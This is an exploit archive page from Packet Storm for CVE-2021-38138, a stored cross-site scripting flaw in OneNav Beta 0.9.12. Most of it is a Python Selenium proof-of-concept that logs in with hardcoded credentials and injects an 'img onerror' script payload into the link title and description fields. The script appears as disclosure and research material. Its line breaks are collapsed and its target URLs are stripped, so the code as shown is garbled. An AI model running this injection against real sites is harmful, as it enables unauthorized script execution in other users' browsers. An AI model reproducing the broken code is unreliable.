OneNav Beta 0.9.12 Cross Site Scripting ≈ Packet Storm



OneNav Beta 0.9.12 Cross Site Scripting ≈ Packet Storm

exploit the possibilities

Register | Login

FilesNewsUsersAuthors

Home Files News &[SERVICES_TAB]About Contact Add New

OneNav Beta 0.9.12 Cross Site Scripting

OneNav Beta 0.9.12 Cross Site Scripting

Posted Aug 7, 2021

Authored by nu11secur1ty

OneNav Beta version 0.9.12 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2021-38138

SHA-256 | 803274adb5909b1835e04650d9e1edee51c3d4b28380326211d5666dde18f8ee

Download | Favorite | View

Related Files

Share This

LinkedInRedditDiggStumbleUpon

OneNav Beta 0.9.12 Cross Site Scripting

Change Mirror Download

# Exploit Title: XSS-Stored - Brutal PWNED on OneNav beta 0.9.12 add_link feature# Author: nu11secur1ty# Testing and Debugging: nu11secur1ty $ g3ck0dr1v3r# Date: 08.06.2021# Vendor: Link: CVE: CVE-2021-38138[+] Exploit Source:#!/usr/bin/python3# Author: @nu11secur1ty# Debug and Developement: nu11secur1ty & g3ck0dr1v3r# CVE-2021-38138from selenium import webdriverimport time#enter the link to the website you want to automate login.website_link=" your login usernameusername="xiaoz"#enter your login passwordpassword="xiaoz.me"#enter the element for username input fieldelement_for_username="user"#enter the element for password input fieldelement_for_password="password"#enter the element for submit buttonelement_for_submit="layui-btn"browser = webdriver.Chrome()browser.get((website_link))try:username_element = browser.find_element_by_name(element_for_username)username_element.send_keys(username)password_element = browser.find_element_by_name(element_for_password)password_element.send_keys(password)signInButton = browser.find_element_by_class_name(element_for_submit)signInButton.click()# Exploit PWNED HTTP Traffic is not filtered. It was a lot of fun :Dtime.sleep(3)browser.get((";))time.sleep(3)browser.execute_script("document.querySelector('[name=\"url\"]').value = ';)time.sleep(3)browser.execute_script("document.querySelector('[name=\"title\"]').value ='</span><img src= href=; onerror=alert(1) /><span>'")#button1browser.execute_script("document.querySelector('[class=\"layui-edge\"]').click()")time.sleep(1)# button2 using $ because querySelector cannot parse dd selectorbrowser.execute_script("$('dd[lay-value=19]').click()")time.sleep(1)browser.execute_script("document.querySelector('[name=\"description\"]').value= '</span><img src= href=; onerror=alert(1) /><span>'")#submit button3browser.execute_script("document.querySelector('[class=\"layui-btn\"]').click()")time.sleep(1)browser.maximize_window()browser.get((";))print("payload is deployed...\n")except Exception:#### This exception occurs if the element are not found in the webpage.print("Some error occured :(")----------------------------------------------------------------------------------------# Reproduce: Proof:

Login or Register to add favorites

Follow us on Twitter

Follow us on Facebook

Subscribe to an RSS Feed

File Archive:January 2024

<SuMoTuWeThFrSa

1Jan 1st0 Files2Jan 2nd21 Files3Jan 3rd28 Files4Jan 4th7 Files5Jan 5th12 Files6Jan 6th1 Files

7Jan 7th1 Files8Jan 8th18 Files9Jan 9th15 Files10Jan 10th23 Files11Jan 11th77 Files12Jan 12th13 Files13Jan 13th0 Files

14Jan 14th0 Files15Jan 15th0 Files16Jan 16th0 Files17Jan 17th0 Files18Jan 18th0 Files19Jan 19th0 Files20Jan 20th0 Files

21Jan 21st0 Files22Jan 22nd0 Files23Jan 23rd0 Files24Jan 24th0 Files25Jan 25th0 Files26Jan 26th0 Files27Jan 27th0 Files

28Jan 28th0 Files29Jan 29th0 Files30Jan 30th0 Files31Jan 31st0 Files

Top Authors In Last 30 Days

Red Hat 92 files

Gentoo 33 files

BugsBD Limited 31 files

Rahad Chowdhury 31 files

Ubuntu 29 files

Debian 25 files

Fernando Mengali 12 files

Google Security Research 9 files

tmrswrr 7 files

Jann Horn 4 files

File TagsActiveX (932)Advisory (83,710)Arbitrary (16,474)BBS (2,859)Bypass (1,805)CGI (1,031)Code Execution (7,470)Conference (685)Cracker (843)CSRF (3,364)DoS (24,148)Encryption (2,375)Exploit (52,402)File Inclusion (4,237)File Upload (982)Firewall (822)Info Disclosure (2,817)Intrusion Detection (900)Java (3,092)JavaScript (882)Kernel (6,877)Local (14,610)Magazine (586)Overflow (12,917)Perl (1,428)PHP (5,164)Proof of Concept (2,356)Protocol (3,671)Python (1,573)Remote (31,133)Root (3,609)Rootkit (517)Ruby (614)Scanner (1,646)Security Tool (7,941)Shell (3,219)Shellcode (1,216)Sniffer (898)Spoof (2,233)SQL Injection (16,462)TCP (2,419)Trojan (687)UDP (896)Virus (667)Vulnerability (32,246)Web (9,805)Whitepaper (3,762)x86 (966)XSS (18,084)OtherFile ArchivesJanuary 2024December 2023November 2023October 2023September 2023August 2023July 2023June 2023May 2023April 2023March 2023February 2023OlderSystemsAIX (429)Apple (2,049)BSD (375)CentOS (57)Cisco (1,926)Debian (6,945)Fedora (1,693)FreeBSD (1,246)Gentoo (4,412)HPUX (880)iOS (366)iPhone (108)IRIX (220)Juniper (69)Linux (48,175)Mac OS X (691)Mandriva (3,105)NetBSD (256)OpenBSD (487)RedHat (14,809)Slackware (941)Solaris (1,611)SUSE (1,444)Ubuntu (9,209)UNIX (9,352)UnixWare (187)Windows (6,619)Other

© 2022 Packet Storm. All rights reserved.

Site Links

News by Month

News Tags

Files by Month

File Tags

File Directory

About Us

History & Purpose

Contact Information

Terms of Service

Privacy Statement

Copyright Information

Services

Security Services

Hosting By

Rokasec

Follow us on Twitter

Follow us on Facebook

Subscribe to an RSS Feed

var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-18885198-1']); _gaq.push (['_gat._anonymizeIp']); _gaq.push(['_setDomainName', '.']); _gaq.push(['_trackPageview']); (function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? '' : '') + '.ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();

................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download